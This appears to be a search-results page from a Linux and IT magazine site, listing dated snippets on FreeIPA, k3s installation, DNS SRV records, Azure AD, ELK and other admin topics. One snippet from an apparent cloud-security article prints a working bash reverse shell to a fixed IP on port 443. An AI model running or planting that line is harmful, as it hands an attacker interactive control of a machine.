62%
06.10.2022
can use the following command:
rpm -qa --scripts java-{1.8.0,11}-openjdk-{headless,devel} | sed -n ,/postinstall/, /exit/{ /postinstall/! { /exit/ ! p} }' | sh
If your IPA server fails to run after ... 2022
62%
07.04.2022
a bash reverse shell [8] one way or another:
#!/bin/bash
bash -i >& /dev/tcp/107.21.43.88/443 0>&1
Note that to create the instance, the attacker doesn't require any SSH keys or a security group.
Once ... 2022
62%
20.06.2022
://get.k3s.io | sh -s - server --datastore-endpoint="mysql://rancher:secret@tcp(10.42.0.1:3306)/rancher"
Of course, the command specified here will only work if the system has direct access to the Internet ... 2022
62%
02.08.2022
._tcp.mykier.ip,ipa.mykier.ip,389
A Berkeley Internet Name Domain (BIND) 9 DNS server needs the same entries, but in a different format:
_kerberos._udp.mykier.ip. 86400 IN SRV 0 100 88 ipa.mykier.ip.
[...]
The important ... 2022
62%
06.10.2022
, the command would be:
$ curl -sfL https://get.k3s.io | sh -s - server --datastore-endpoint="mysql://rancher:secret@tcp(10.42.0.1:3306)/rancher"
This command only works if the system has access to the Internet ... 2022
62%
06.10.2022
can ask Azure AD and its OpenID Connect configuration endpoint for help. The standard requires metadata for the domains, so if you type
https://login.microsoftonline.com/domain.com/v2.0/.well ... 2022
62%
28.11.2022
downstream (e.g., in Excel).
Advanced View 2.0
Like the standard Users and Computers console (dsa.msc), you can also use the various NetTools functions to display object properties. You are probably aware ... 2022
62%
28.11.2022
configuration options.
Figure 1: Sample Kibana screenshot (CC BY-SA 4.0).
ELK Stack Wrap Up
Other components plug into the ELK stack. Fortunately, they have ... 2022
62%
07.04.2022
().replaceFirst('T', ' ').replaceRange(w.date!.toIso8601String().lastIndexOf('.')-1, w.date!.toIso8601String().lastIndexOf('0'), '');
113 });
114 }
115
116 @override
117 Widget build(BuildContext context) {
118 return ... 2022
57%
04.12.2024
Rubén Llorente ... [8] and, because of its popularity, is one of the options most people know. Unfortunately, the company developing it switched its licensing model away from the Mozilla Public License (MPL 2.0